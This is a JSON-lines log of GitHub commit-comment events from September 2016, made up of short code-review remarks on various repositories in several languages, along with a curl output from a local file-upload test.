{"id":"4619900117","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":19178350,"position":null,"line":null,"path":null,"commit_id":"d9869c208271da9eab2d0af4836f576330260728","created_at":"2016-09-26T19:26:39Z","updated_at":"2016-09-26T19:26:39Z","body":"The following doc(s) have been deployed to the [terminusma](https://terminusma-static-docs.pantheonsite.io/docs) Multidev environment:\n- [docs/terminus/commands](https://terminusma-static-docs.pantheonsite.io/docs/terminus/commands)\n- [docs/terminus/examples](https://terminusma-static-docs.pantheonsite.io/docs/terminus/examples)\n- [source/docs/assets/js/main.js](https://github.com/pantheon-systems/documentation/commit/138d94262acf87c47e222e4d1efac1876fa067e8/source/docs/assets/js/main.js)\n- [docs/guides/terminus](https://terminusma-static-docs.pantheonsite.io/docs/guides/terminus)\n"}},"created_at":"2016-09-26T19:26:39Z"}
{"id":"4619900963","type":"CommitCommentEvent","actor":{"login":"Dembelo-Jessica"},"repo":{"name":"typearea/projectmanagement"},"payload":{"comment":{"id":19178353,"position":null,"line":null,"path":null,"commit_id":"df927f1d74fc319ac13d912beaa8675efa7de275","created_at":"2016-09-26T19:26:48Z","updated_at":"2016-09-26T19:26:48Z","body":"Ich würde das mit der hellen Schrift vorziehen. Das hat schöne Kontraste."}},"created_at":"2016-09-26T19:26:48Z"}
{"id":"4619903106","type":"CommitCommentEvent","actor":{"login":"catwell"},"repo":{"name":"andremm/typedlua"},"payload":{"comment":{"id":19178359,"position":69,"line":473,"path":"doc/thesis/evaluation.tex","commit_id":"e65ee0715f4b10c87608fc6770853466c4b44f37","created_at":"2016-09-26T19:27:13Z","updated_at":"2016-09-26T19:27:13Z","body":"I just noticed that you used my library as an example, almost two years later :)\r\n\r\nAFAIK what you are talking about is not a bug, it is that the two last libraries I try to use are old-style and work by setting globals. Still AFAIK, typedlua cannot know about that.\r\n\r\nMore precisely:\r\n\r\n- New versions of \"md5\" return a table which we use in recent versions of digest. Old versions of \"md5\" only set the global `md5` so we use it. The version of digest that you put in your repo is an old version that only supports the old \"md5\" module.\r\n- \"digest\" always uses globals (that's what the comment \"last because using globals\" meant).\r\n"}},"created_at":"2016-09-26T19:27:13Z"}
{"id":"4619903220","type":"CommitCommentEvent","actor":{"login":"rimutaka"},"repo":{"name":"hubsy-io/timelapse"},"payload":{"comment":{"id":19178361,"position":null,"line":null,"path":null,"commit_id":"14272f7cfc8d40f0d4e779c238bb21edcfbddca7","created_at":"2016-09-26T19:27:14Z","updated_at":"2016-09-26T19:27:14Z","body":"Ehsan, why did you delete the policy section?\r\nI think we should reference the policy files if you think there is duplication."}},"created_at":"2016-09-26T19:27:14Z"}
{"id":"4619904380","type":"CommitCommentEvent","actor":{"login":"palamago"},"repo":{"name":"jaimezegpi/primer_ejercicio"},"payload":{"comment":{"id":19178364,"position":null,"line":null,"path":null,"commit_id":"336fc27ed08be1f4c8ee98e23d738127cafada6b","created_at":"2016-09-26T19:27:27Z","updated_at":"2016-09-26T19:27:27Z","body":"Ordenado el CSS y bien estructurado el HTML 👍 "}},"created_at":"2016-09-26T19:27:27Z"}
{"id":"4619907268","type":"CommitCommentEvent","actor":{"login":"TheAlphaNerd"},"repo":{"name":"jerseyscript/jerseyscript.github.io"},"payload":{"comment":{"id":19178375,"position":null,"line":null,"path":null,"commit_id":"4645377c7063bd7538ddce04169ec11c8b826115","created_at":"2016-09-26T19:28:00Z","updated_at":"2016-09-26T19:28:00Z","body":"🍁🍂🍃"}},"created_at":"2016-09-26T19:28:00Z"}
{"id":"4619910911","type":"CommitCommentEvent","actor":{"login":"mikemand"},"repo":{"name":"laracasts/How-Do-I-Dry-Up-My-Forms"},"payload":{"comment":{"id":19178388,"position":7,"line":7,"path":"resources/views/posts/form.blade.php","commit_id":"c09e14f9c1417b7eae6493bb1286ec56c162deb5","created_at":"2016-09-26T19:28:39Z","updated_at":"2016-09-26T19:28:39Z","body":"Couldn't you just do `old('title', $post->title)`? Or did that change in Laravel 5.3?"}},"created_at":"2016-09-26T19:28:39Z"}
{"id":"4619912243","type":"CommitCommentEvent","actor":{"login":"romanz"},"repo":{"name":"romanz/trezor-agent"},"payload":{"comment":{"id":19178391,"position":null,"line":null,"path":null,"commit_id":"bf598435fb3a4075d7ff0de7d69c6137cb96b374","created_at":"2016-09-26T19:28:54Z","updated_at":"2016-09-26T19:28:54Z","body":"Should fix #34 - so the device would keep the session open (so the next operations won't require PIN entry)."}},"created_at":"2016-09-26T19:28:54Z"}
{"id":"4619912366","type":"CommitCommentEvent","actor":{"login":"palamago"},"repo":{"name":"Pablo2147/Trabajos-Practicos"},"payload":{"comment":{"id":19178392,"position":null,"line":null,"path":null,"commit_id":"8f3c776590b3ae099f10cf4a429d8cff23d18c3d","created_at":"2016-09-26T19:28:55Z","updated_at":"2016-09-26T19:28:55Z","body":"Excelente como va quedando. Muy prolijo el CSS."}},"created_at":"2016-09-26T19:28:55Z"}
{"id":"4619912873","type":"CommitCommentEvent","actor":{"login":"shadycuz"},"repo":{"name":"firehol/netdata"},"payload":{"comment":{"id":19178394,"position":null,"line":null,"path":null,"commit_id":"8b136be32afcc7ddeb66b19e7e786e832f64a785","created_at":"2016-09-26T19:29:01Z","updated_at":"2016-09-26T19:29:01Z","body":"I only meant the small grammar changes, which I need to go through the rest of the wiki, I either spend my free time working on learning python or git cli. On top of all the other things like work, and my vm's. I'm not sure how you do it."}},"created_at":"2016-09-26T19:29:01Z"}
{"id":"4619917535","type":"CommitCommentEvent","actor":{"login":"palamago"},"repo":{"name":"mantune1/portfolio-ma"},"payload":{"comment":{"id":19178402,"position":null,"line":null,"path":null,"commit_id":"636166bb69e5fe39a2e4c71196cc90bac8d068ef","created_at":"2016-09-26T19:29:54Z","updated_at":"2016-09-26T19:29:54Z","body":"Bien estructurado!\r\nLe falta, pero lo iremos completando."}},"created_at":"2016-09-26T19:29:54Z"}
{"id":"4619920299","type":"CommitCommentEvent","actor":{"login":"DavidCurtis321"},"repo":{"name":"beetbox/beets"},"payload":{"comment":{"id":19178408,"position":8,"line":8,"path":"appveyor.yml","commit_id":"164dafecd8154529050dbd37aee47f8e37ff521f","created_at":"2016-09-26T19:30:24Z","updated_at":"2016-09-26T19:30:24Z","body":"Skype call link: https://join.skype.com/ABghQ3eNR1JP?source=outlook\r\n"}},"created_at":"2016-09-26T19:30:24Z"}
{"id":"4619922805","type":"CommitCommentEvent","actor":{"login":"palamago"},"repo":{"name":"indigovioleta/trabajos-practicos"},"payload":{"comment":{"id":19178416,"position":null,"line":null,"path":null,"commit_id":"e80a567f359b559b811b7dbb9ee8e0fbf4f690b1","created_at":"2016-09-26T19:30:50Z","updated_at":"2016-09-26T19:30:50Z","body":"Muy completo! Muy bueno!"}},"created_at":"2016-09-26T19:30:50Z"}
{"id":"4619929087","type":"CommitCommentEvent","actor":{"login":"mack2015"},"repo":{"name":"mack2015/WebDesign-a4"},"payload":{"comment":{"id":19178427,"position":null,"line":null,"path":null,"commit_id":"c31ce0b841c59121af9609315643d329218ca7af","created_at":"2016-09-26T19:31:58Z","updated_at":"2016-09-26T19:31:58Z","body":"Hello, its Mack... Welcome to my Web Page"}},"created_at":"2016-09-26T19:31:58Z"}
{"id":"4619930311","type":"CommitCommentEvent","actor":{"login":"damasterham"},"repo":{"name":"damasterham/javachess"},"payload":{"comment":{"id":19178431,"position":4,"line":4,"path":".idea/encodings.xml","commit_id":"005b3295258243d2652f5524dcba6876a18d899f","created_at":"2016-09-26T19:32:12Z","updated_at":"2016-09-26T19:32:12Z","body":"Remove"}},"created_at":"2016-09-26T19:32:12Z"}
{"id":"4619930582","type":"CommitCommentEvent","actor":{"login":"vr2262"},"repo":{"name":"A-star-vengers/km3227"},"payload":{"comment":{"id":19178432,"position":null,"line":null,"path":null,"commit_id":"52b91d6d3f72c911daa917e0e66e68cd2f416578","created_at":"2016-09-26T19:32:15Z","updated_at":"2016-09-26T19:32:15Z","body":"@kylematoba I enable Travis CI for all the existing repositories just now: https://travis-ci.org/profile/A-star-vengers"}},"created_at":"2016-09-26T19:32:15Z"}
{"id":"4619930912","type":"CommitCommentEvent","actor":{"login":"rimutaka"},"repo":{"name":"hubsy-io/timelapse"},"payload":{"comment":{"id":19178434,"position":12,"line":21,"path":"infrastructure/default-config.json","commit_id":"14272f7cfc8d40f0d4e779c238bb21edcfbddca7","created_at":"2016-09-26T19:32:18Z","updated_at":"2016-09-26T19:32:18Z","body":"This tag bothers me :) Let's rename it to quality. I'll post an issue."}},"created_at":"2016-09-26T19:32:18Z"}
{"id":"4619931385","type":"CommitCommentEvent","actor":{"login":"lemon-school"},"repo":{"name":"safarov-ua/lemon-school"},"payload":{"comment":{"id":19178436,"position":null,"line":null,"path":null,"commit_id":"76cf54c05c9d55d7b63937f47f35094a84601064","created_at":"2016-09-26T19:32:24Z","updated_at":"2016-09-26T19:32:24Z","body":"чуть с бордерами накосячил и ячейка пляшет при ховере на ссылку"}},"created_at":"2016-09-26T19:32:24Z"}
{"id":"4619932808","type":"CommitCommentEvent","actor":{"login":"macool"},"repo":{"name":"noggalito/porttare-backend"},"payload":{"comment":{"id":19178439,"position":4,"line":13,"path":"app/models/provider_office.rb","commit_id":"6533cdeb02cfe9891aa8d1fb282db5501482508c","created_at":"2016-09-26T19:32:40Z","updated_at":"2016-09-26T19:32:40Z","body":"te falta una migración? este campo sí existe"}},"created_at":"2016-09-26T19:32:40Z"}
{"id":"4619935466","type":"CommitCommentEvent","actor":{"login":"bryanlandia"},"repo":{"name":"appsembler/edx-platform"},"payload":{"comment":{"id":19178442,"position":null,"line":null,"path":null,"commit_id":"8798729c5d8c16213876c223427b54a3e9b74719","created_at":"2016-09-26T19:33:11Z","updated_at":"2016-09-26T19:33:11Z","body":"@melvinsoft is the new code directly from the CMS?\r\nI know this is just a hack to get arou d the bug but might be cleaner to put the repeated code in a function inside the method. I havvent tested yet"}},"created_at":"2016-09-26T19:33:11Z"}
{"id":"4619936013","type":"CommitCommentEvent","actor":{"login":"fabricioflores"},"repo":{"name":"noggalito/porttare-backend"},"payload":{"comment":{"id":19178443,"position":4,"line":13,"path":"app/models/provider_office.rb","commit_id":"6533cdeb02cfe9891aa8d1fb282db5501482508c","created_at":"2016-09-26T19:33:17Z","updated_at":"2016-09-26T19:33:17Z","body":"déjame revisar\r\n"}},"created_at":"2016-09-26T19:33:17Z"}
{"id":"4619936777","type":"CommitCommentEvent","actor":{"login":"achow-zenoss"},"repo":{"name":"zenoss/build-tools"},"payload":{"comment":{"id":19178445,"position":null,"line":null,"path":null,"commit_id":"aac4552798f37a4cf3bb03ad7d190c87206f2b53","created_at":"2016-09-26T19:33:26Z","updated_at":"2016-09-26T19:33:26Z","body":"yes, you are correct. These are already in the upstream base."}},"created_at":"2016-09-26T19:33:26Z"}
{"id":"4619937132","type":"CommitCommentEvent","actor":{"login":"rimutaka"},"repo":{"name":"hubsy-io/timelapse"},"payload":{"comment":{"id":19178446,"position":5,"line":32,"path":"package.json","commit_id":"14272f7cfc8d40f0d4e779c238bb21edcfbddca7","created_at":"2016-09-26T19:33:31Z","updated_at":"2016-09-26T19:33:31Z","body":"Does this need to be in the config? Can it be included in the project?"}},"created_at":"2016-09-26T19:33:31Z"}
{"id":"4619939431","type":"CommitCommentEvent","actor":{"login":"lemon-school"},"repo":{"name":"safarov-ua/lemon-school"},"payload":{"comment":{"id":19178452,"position":18,"line":18,"path":"10/style.css","commit_id":"e600e61c1bad608d08653df669e50341b0013c95","created_at":"2016-09-26T19:33:54Z","updated_at":"2016-09-26T19:33:54Z","body":"а фокус на инпут где?\r\nу меня тень, а у тебя стандартный `outline`"}},"created_at":"2016-09-26T19:33:54Z"}
{"id":"4619942083","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/OpenCloudConfig"},"payload":{"comment":{"id":19178458,"position":null,"line":null,"path":null,"commit_id":"a41b2c9df1641b2776a283324acc78675a0ed251","created_at":"2016-09-26T19:34:25Z","updated_at":"2016-09-26T19:34:25Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#VB2jS1hjSqu1QEoglp0Wqg"}},"created_at":"2016-09-26T19:34:25Z"}
{"id":"4619942478","type":"CommitCommentEvent","actor":{"login":"jf---"},"repo":{"name":"tpaviot/pythonocc-core"},"payload":{"comment":{"id":19178461,"position":null,"line":null,"path":null,"commit_id":"2dde9549c86226753aefde70a595f2e90a36ef79","created_at":"2016-09-26T19:34:30Z","updated_at":"2016-09-26T19:34:30Z","body":"@tpaviot, this is more of a unittest, the example I made is rotating a line generating a kind of a beautiful design, this is not a visual example...\r\nshall I push a unittest to this branch?"}},"created_at":"2016-09-26T19:34:30Z"}
{"id":"4619946062","type":"CommitCommentEvent","actor":{"login":"carrilloandre"},"repo":{"name":"carrilloandre/hello-world"},"payload":{"comment":{"id":19178469,"position":null,"line":null,"path":null,"commit_id":"d6bed1e4bf667c4ffeff5753afaea4edfd645af9","created_at":"2016-09-26T19:35:11Z","updated_at":"2016-09-26T19:35:11Z","body":"I also increased the heights of my pictures by 10px."}},"created_at":"2016-09-26T19:35:11Z"}
{"id":"4619946201","type":"CommitCommentEvent","actor":{"login":"rimutaka"},"repo":{"name":"hubsy-io/timelapse"},"payload":{"comment":{"id":19178470,"position":1,"line":29,"path":"package.json","commit_id":"14272f7cfc8d40f0d4e779c238bb21edcfbddca7","created_at":"2016-09-26T19:35:13Z","updated_at":"2016-09-26T19:35:13Z","body":"These params look more like constants to me. Do they need to be in the config?"}},"created_at":"2016-09-26T19:35:13Z"}
{"id":"4619947782","type":"CommitCommentEvent","actor":{"login":"lemon-school"},"repo":{"name":"daniil-trenin/lemon-school"},"payload":{"comment":{"id":19178475,"position":null,"line":null,"path":null,"commit_id":"99c315553b516e2d7b8705c6e836a7aa4089154d","created_at":"2016-09-26T19:35:31Z","updated_at":"2016-09-26T19:35:31Z","body":"все прыгает при ховере на строку таблицы, тень потрял, градиент потерял"}},"created_at":"2016-09-26T19:35:31Z"}
{"id":"4619949463","type":"CommitCommentEvent","actor":{"login":"kylematoba"},"repo":{"name":"A-star-vengers/km3227"},"payload":{"comment":{"id":19178480,"position":null,"line":null,"path":null,"commit_id":"52b91d6d3f72c911daa917e0e66e68cd2f416578","created_at":"2016-09-26T19:35:50Z","updated_at":"2016-09-26T19:35:50Z","body":"Thanks Viktor! Going to play around with it a bit. Seems like a good\ncandidate for our CI :).\n\nOn Mon, Sep 26, 2016 at 8:32 PM, Viktor Roytman <notifications@github.com>\nwrote:\n\n> @kylematoba <https://github.com/kylematoba> I enable Travis CI for all\n> the existing repositories just now: https://travis-ci.org/profile/\n> A-star-vengers\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/A-star-vengers/km3227/commit/52b91d6d3f72c911daa917e0e66e68cd2f416578#commitcomment-19178432>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AVJyZ38KsWbLIIm5txOIDfcuod6gJk9Sks5quB2_gaJpZM4KG6BS>\n> .\n>\n"}},"created_at":"2016-09-26T19:35:50Z"}
{"id":"4619950839","type":"CommitCommentEvent","actor":{"login":"borgdylan"},"repo":{"name":"dotnet/standard"},"payload":{"comment":{"id":19178488,"position":null,"line":null,"path":null,"commit_id":"014881be5655148b8fd9e69d3fd7fbdc928ba2a2","created_at":"2016-09-26T19:36:07Z","updated_at":"2016-09-26T19:36:07Z","body":"@terrajobst APIs such as Array.Empty have already made it to Mono which tries to mimic .NET 4.6.1 whenever possible. These APIs should have made it to Xamarin as well."}},"created_at":"2016-09-26T19:36:07Z"}
{"id":"4619955945","type":"CommitCommentEvent","actor":{"login":"bryanlandia"},"repo":{"name":"appsembler/edx-platform"},"payload":{"comment":{"id":19178521,"position":null,"line":null,"path":null,"commit_id":"8798729c5d8c16213876c223427b54a3e9b74719","created_at":"2016-09-26T19:37:07Z","updated_at":"2016-09-26T19:37:07Z","body":"I tested, works as you say!"}},"created_at":"2016-09-26T19:37:07Z"}
{"id":"4619962911","type":"CommitCommentEvent","actor":{"login":"chrisseaton"},"repo":{"name":"jruby/jruby"},"payload":{"comment":{"id":19178543,"position":5,"line":580,"path":"truffle/src/main/ruby/core/truffle/cext.rb","commit_id":"febe6a1f26c6ca3d95962aa3a7cef5fe2bb24389","created_at":"2016-09-26T19:38:31Z","updated_at":"2016-09-26T19:38:31Z","body":"We want to not call any user allocate method, but we do want to call core allocate methods. I'm not sure how to fix that really. Maybe I should define `#internal_allocate` for all core classes? I could do that automatically even."}},"created_at":"2016-09-26T19:38:31Z"}
{"id":"4619964348","type":"CommitCommentEvent","actor":{"login":"aekeus"},"repo":{"name":"luixxiul/browser-laptop"},"payload":{"comment":{"id":19178547,"position":null,"line":null,"path":null,"commit_id":"b3b0ade6997cd439e3a09f1efa25014d44da1246","created_at":"2016-09-26T19:38:49Z","updated_at":"2016-09-26T19:38:49Z","body":"++"}},"created_at":"2016-09-26T19:38:49Z"}
{"id":"4619966756","type":"CommitCommentEvent","actor":{"login":"chrisseaton"},"repo":{"name":"jruby/jruby"},"payload":{"comment":{"id":19178556,"position":null,"line":null,"path":null,"commit_id":"601b267202430491127716af7d70c62e2cf9ca2c","created_at":"2016-09-26T19:39:16Z","updated_at":"2016-09-26T19:39:16Z","body":"It's further complicated by the fact that the varargs are `VALUE*` - we can't put that in a Ruby array."}},"created_at":"2016-09-26T19:39:16Z"}
{"id":"4619967232","type":"CommitCommentEvent","actor":{"login":"lakruzz"},"repo":{"name":"Praqma/praqma.com"},"payload":{"comment":{"id":19178557,"position":null,"line":null,"path":null,"commit_id":"bc86923f96139756c86d9c60898b722bfa9c63ee","created_at":"2016-09-26T19:39:21Z","updated_at":"2016-09-26T19:39:21Z","body":"@les-praqma fine improvements - I'm finding another picture - less controversial, but still with wings :-)"}},"created_at":"2016-09-26T19:39:21Z"}
{"id":"4619971901","type":"CommitCommentEvent","actor":{"login":"dceejay"},"repo":{"name":"node-red/node-red"},"payload":{"comment":{"id":19178578,"position":null,"line":null,"path":null,"commit_id":"a89c7b1a70cc2818664797d634d7e862d14520f5","created_at":"2016-09-26T19:40:14Z","updated_at":"2016-09-26T19:40:14Z","body":"since the OED said so - https://en.oxforddictionaries.com/definition/path\r\n"}},"created_at":"2016-09-26T19:40:14Z"}
{"id":"4619972980","type":"CommitCommentEvent","actor":{"login":"FloriansGit"},"repo":{"name":"FloriansGit/cryptopp"},"payload":{"comment":{"id":19178581,"position":null,"line":null,"path":null,"commit_id":"a181ec71cd508085a90b12835eeb458c8ba3a66a","created_at":"2016-09-26T19:40:27Z","updated_at":"2016-09-26T19:40:27Z","body":"Fixes #273"}},"created_at":"2016-09-26T19:40:27Z"}
{"id":"4619974959","type":"CommitCommentEvent","actor":{"login":"lemon-school"},"repo":{"name":"JakimOFF/lemon-school"},"payload":{"comment":{"id":19178587,"position":25,"line":25,"path":"9/css/style.css","commit_id":"89db5e3c7540410faf68fd6ca002bec31d23fff6","created_at":"2016-09-26T19:40:50Z","updated_at":"2016-09-26T19:40:50Z","body":"не стОит"}},"created_at":"2016-09-26T19:40:50Z"}
{"id":"4619975974","type":"CommitCommentEvent","actor":{"login":"BerserkerTroll"},"repo":{"name":"root-mirror/root"},"payload":{"comment":{"id":19178589,"position":5,"line":149,"path":"hist/hist/v7/inc/ROOT/THist.h","commit_id":"e1d8a316ce78698f410d12c8ec8b767a1db5488a","created_at":"2016-09-26T19:41:03Z","updated_at":"2016-09-26T19:41:03Z","body":"Something is telling me that it wont be so easy to return non-const reference from `const`-qualified member function…"}},"created_at":"2016-09-26T19:41:03Z"}
{"id":"4619979902","type":"CommitCommentEvent","actor":{"login":"lemon-school"},"repo":{"name":"JakimOFF/lemon-school"},"payload":{"comment":{"id":19178597,"position":27,"line":27,"path":"9/css/style.css","commit_id":"89db5e3c7540410faf68fd6ca002bec31d23fff6","created_at":"2016-09-26T19:41:46Z","updated_at":"2016-09-26T19:41:46Z","body":"13px только заголовок таблицы, ячейки по 14"}},"created_at":"2016-09-26T19:41:46Z"}
{"id":"4619986753","type":"CommitCommentEvent","actor":{"login":"lemon-school"},"repo":{"name":"JakimOFF/lemon-school"},"payload":{"comment":{"id":19178608,"position":37,"line":37,"path":"10/css/style.css","commit_id":"3db4febfdf99fcfaf3c6322e90b6ce8420e289ee","created_at":"2016-09-26T19:43:04Z","updated_at":"2016-09-26T19:43:04Z","body":"а где божественная тень на фокус?"}},"created_at":"2016-09-26T19:43:04Z"}
{"id":"4619991255","type":"CommitCommentEvent","actor":{"login":"rictic"},"repo":{"name":"Polymer/polymer-analyzer"},"payload":{"comment":{"id":19178617,"position":7,"line":7,"path":".vscode/settings.json","commit_id":"b9b77fded43b1800e82c6cf3df51dc195a3db6b6","created_at":"2016-09-26T19:43:57Z","updated_at":"2016-09-26T19:43:57Z","body":"Is this what we want? This excludes any lib/ directory anywhere\r\n\r\nConsider just:\r\n\r\n`lib/`"}},"created_at":"2016-09-26T19:43:57Z"}
{"id":"4619994575","type":"CommitCommentEvent","actor":{"login":"lemon-school"},"repo":{"name":"Artem-Iakovlev/Lemon-School"},"payload":{"comment":{"id":19178629,"position":14,"line":14,"path":"9/css/style.css","commit_id":"421969a95232577b8e5bc0ab9fd3569456edd4ab","created_at":"2016-09-26T19:44:37Z","updated_at":"2016-09-26T19:44:37Z","body":"шрифт не работает"}},"created_at":"2016-09-26T19:44:37Z"}
{"id":"4619998080","type":"CommitCommentEvent","actor":{"login":"lemon-school"},"repo":{"name":"Artem-Iakovlev/Lemon-School"},"payload":{"comment":{"id":19178634,"position":null,"line":null,"path":null,"commit_id":"421969a95232577b8e5bc0ab9fd3569456edd4ab","created_at":"2016-09-26T19:45:17Z","updated_at":"2016-09-26T19:45:17Z","body":"размеры не те, таблица не там, ховеры недоделанные, тень таблицы потеряна"}},"created_at":"2016-09-26T19:45:17Z"}
{"id":"4619998643","type":"CommitCommentEvent","actor":{"login":"paulathevalley"},"repo":{"name":"FormidableLabs/formidable-playbook-docs"},"payload":{"comment":{"id":19178635,"position":null,"line":null,"path":null,"commit_id":"6efbc8f4577aedd84d3b7b7ff193b48ed2755d7e","created_at":"2016-09-26T19:45:24Z","updated_at":"2016-09-26T19:45:24Z","body":"@ebrillhart You don't actually need to point to a specific commit. When travis builds the site, it runs `npm update formidable-playbook`, which pulls down the latest commit on the repo since the dependency is pointing to `FormidableLabs/formidable-playbook`. We could update the dependency to be more explicit, so it could say `FormidableLabs/formidable-playbook#master`, which will do the same thing, but perhaps clearer to read."}},"created_at":"2016-09-26T19:45:24Z"}
{"id":"4619999261","type":"CommitCommentEvent","actor":{"login":"goktugyil"},"repo":{"name":"goktugyil/EZSwiftExtensions"},"payload":{"comment":{"id":19178637,"position":210,"line":245,"path":"Sources/EZSwiftFunctions.swift","commit_id":"201850843fe4486b45bb0ac715f9a3fa2eb18e95","created_at":"2016-09-26T19:45:31Z","updated_at":"2016-09-26T19:45:31Z","body":"I think this isn't as useful anymore, what do you think?"}},"created_at":"2016-09-26T19:45:31Z"}
{"id":"4619999359","type":"CommitCommentEvent","actor":{"login":"pdurbin"},"repo":{"name":"pdurbin/dataverse"},"payload":{"comment":{"id":19178638,"position":null,"line":null,"path":null,"commit_id":"c90fb7cf5d22feb9a89d5eb14a3887b847ceaee1","created_at":"2016-09-26T19:45:32Z","updated_at":"2016-09-26T19:45:32Z","body":"Here's the output from the script above:\r\n\r\n```\r\n(dataverse) murphy:dataverse pdurbin$ scripts/issues/1612/multipart-upload\r\n*   Trying ::1...\r\n* Connected to localhost (::1) port 8080 (#0)\r\n> POST /uploadServlet HTTP/1.1\r\n> Host: localhost:8080\r\n> User-Agent: curl/7.43.0\r\n> Accept: */*\r\n> Content-Length: 1865\r\n> Expect: 100-continue\r\n> Content-Type: multipart/form-data; boundary=------------------------61dfcc23327cb180\r\n> \r\n< HTTP/1.1 100 Continue\r\n< HTTP/1.1 200 OK\r\n< Server: GlassFish Server Open Source Edition  4.1 \r\n< X-Powered-By: Servlet/3.1 JSP/2.3 (GlassFish Server Open Source Edition  4.1  Java/Oracle Corporation/1.8)\r\n< Date: Mon, 26 Sep 2016 19:45:02 GMT\r\n< Content-Type: text/html;charset=UTF-8\r\n< Transfer-Encoding: chunked\r\n< \r\n<!DOCTYPE html>\r\n<html>\r\n<head>\r\n<title>File Upload Servlet</title>\r\n</head>\r\n<body>\r\n<h1>File Upload Servlet</h1>\r\nReceiving the uploaded file ...<br>\r\nReceived 2 parts ...<br>\r\n... name: key1\r\n... size: 6\r\n... header names: [content-disposition]\r\n... content type: null\r\n... content: value1\r\n... writing null part<br>\r\n... written<br>\r\n---<br>\r\n... name: upload\r\n... size: 1563\r\n... header names: [content-disposition, content-type]\r\n... content type: application/octet-stream\r\n... content: Dataverse \r\n==========\r\n\r\nDataverse is an open source web application for sharing, citing, analyzing, and preserving research data (developed by the [Data Science team] (http://datascience.iq.harvard.edu/about-dataverse) at the [Institute for Quantitative Social Science] (http://iq.harvard.edu/)).\r\n\r\nInstitutions and organizations can choose to install the Dataverse software for their own use. \r\nIn this case, the institution will be responsible for maintaining the application; installing upgrades, \r\nsetting up backups and data replication as needed. Dataverse 4.0 is now released and used by the Harvard Dataverse: [dataverse.harvard.edu] (http://dataverse.harvard.edu/). If you'd like to first test it, you can use our demo site: [demo.dataverse.org](http://demo.dataverse.org).\r\n\r\nFor more general information about Dataverse please visit\r\n[dataverse.org] (http://dataverse.org). \r\n\r\nThe Dataverse code is *open-source* and *free*. \r\n\r\nDataverse releases are available for download from https://github.com/IQSS/dataverse/releases and installation instructions can be found in the [Installation Guide](http://guides.dataverse.org/en/latest/installation/).\r\n\r\n[![Dataverse Project logo](src/main/webapp/resources/images/dataverseproject_logo.jpg?raw=true \"Dataverse Project\")](http://dataverse.org)\r\n\r\n[![Build Status](https://travis-ci.org/IQSS/dataverse.svg?branch=master)](https://travis-ci.org/IQSS/dataverse) [![Coverage Status](https://coveralls.io/repos/IQSS/dataverse/badge.svg?branch=master&service=github)](https://coveralls.io/github/IQSS/dataverse?branch=master)\r\n... writing README.md part<br>\r\n... written<br>\r\n---<br>\r\n... uploaded to: /tmp/README.md\r\n</body>\r\n</html>\r\n* Connection #0 to host localhost left intact\r\n(dataverse) murphy:dataverse pdurbin$ \r\n```"}},"created_at":"2016-09-26T19:45:32Z"}
{"id":"4620002017","type":"CommitCommentEvent","actor":{"login":"awong-dev"},"repo":{"name":"DevProgress/debate-bingo"},"payload":{"comment":{"id":19178644,"position":null,"line":null,"path":null,"commit_id":"eb7d1ec04bfd52652dd6ea11d7de079c5e8f360f","created_at":"2016-09-26T19:46:03Z","updated_at":"2016-09-26T19:46:03Z","body":"LGTM"}},"created_at":"2016-09-26T19:46:03Z"}
{"id":"4620003558","type":"CommitCommentEvent","actor":{"login":"soulgalore"},"repo":{"name":"sitespeedio/pagexray"},"payload":{"comment":{"id":19178648,"position":4,"line":27,"path":"lib/statistics.js","commit_id":"9e372d6cd64be7a14b2b1806aafd0379f5c59551","created_at":"2016-09-26T19:46:21Z","updated_at":"2016-09-26T19:46:21Z","body":"@tobli do you remember how this was broken, like you get a stats object with everything zeroes? It breaks the coach, that breaks sitespeed.io https://github.com/sitespeedio/sitespeed.io/issues/1221 \r\n\r\nThinking it's better to keep the object structure so that the coach and other users don't need to check all fields for undefined. "}},"created_at":"2016-09-26T19:46:21Z"}
{"id":"4620011393","type":"CommitCommentEvent","actor":{"login":"piv199"},"repo":{"name":"goktugyil/EZSwiftExtensions"},"payload":{"comment":{"id":19178669,"position":210,"line":245,"path":"Sources/EZSwiftFunctions.swift","commit_id":"201850843fe4486b45bb0ac715f9a3fa2eb18e95","created_at":"2016-09-26T19:47:48Z","updated_at":"2016-09-26T19:47:48Z","body":"this is absolutely"}},"created_at":"2016-09-26T19:47:48Z"}
{"id":"4620011963","type":"CommitCommentEvent","actor":{"login":"Pieterth"},"repo":{"name":"rekkit/ExData_Plotting1"},"payload":{"comment":{"id":19178670,"position":null,"line":null,"path":null,"commit_id":"d5aa3ee087a56609d33e7f6a23165e648ca3f19b","created_at":"2016-09-26T19:47:55Z","updated_at":"2016-09-26T19:47:55Z","body":"Excellent work! Neat coding!"}},"created_at":"2016-09-26T19:47:55Z"}
{"id":"4620013152","type":"CommitCommentEvent","actor":{"login":"andreashorn"},"repo":{"name":"leaddbs/leaddbs"},"payload":{"comment":{"id":19178674,"position":null,"line":null,"path":null,"commit_id":"94366cd73dfad6ba8cd78b85e5f7795507ac65e0","created_at":"2016-09-26T19:48:10Z","updated_at":"2016-09-26T19:48:10Z","body":"Hi @QRabbani, thanks for your commit, however some comments:\r\nTo catch exceptions using try/catch is easy but dangerous in this case.\r\nInstead, could you please supply an additional argument (e.g. \"auto\") from your leadDBSauto script when calling ea_genvat_simbio?\r\nThen query the presence of this additional input instead of using try/catch?\r\nThat would be awesome. Thanks!"}},"created_at":"2016-09-26T19:48:10Z"}
{"id":"4620014561","type":"CommitCommentEvent","actor":{"login":"ebrillhart"},"repo":{"name":"FormidableLabs/formidable-playbook-docs"},"payload":{"comment":{"id":19178677,"position":null,"line":null,"path":null,"commit_id":"6efbc8f4577aedd84d3b7b7ff193b48ed2755d7e","created_at":"2016-09-26T19:48:27Z","updated_at":"2016-09-26T19:48:27Z","body":"@paulathevalley ah gotcha, that makes sense. what's the best thing to do in a situation where nothing changes in the docs repo that can be committed/pushed but there needs to be an update anyway? that was my logic behind adding it."}},"created_at":"2016-09-26T19:48:27Z"}
